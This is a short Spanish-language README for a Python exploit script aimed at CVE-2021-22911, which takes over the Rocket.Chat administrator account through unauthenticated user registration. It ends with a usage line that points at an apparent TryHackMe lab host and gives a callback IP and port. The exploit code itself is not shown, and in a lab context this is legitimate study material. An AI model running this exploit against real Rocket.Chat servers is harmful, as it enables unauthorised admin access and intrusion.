
Script de exploit en Python para CVE-2021-22911 dirigido al restablecimiento de contraseña de administrador de Rocket.Chat mediante el registro de usuarios no autenticado. Automatiza la explotación con objetivo, nombre de usuario administrador y IP de devolución de llamada configurables.
Si ya has registrado un usuario, esto solo restablecerá la contraseña del administrador, y no ambas. Haciendo que el exploit se ejecute mucho más rápido.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80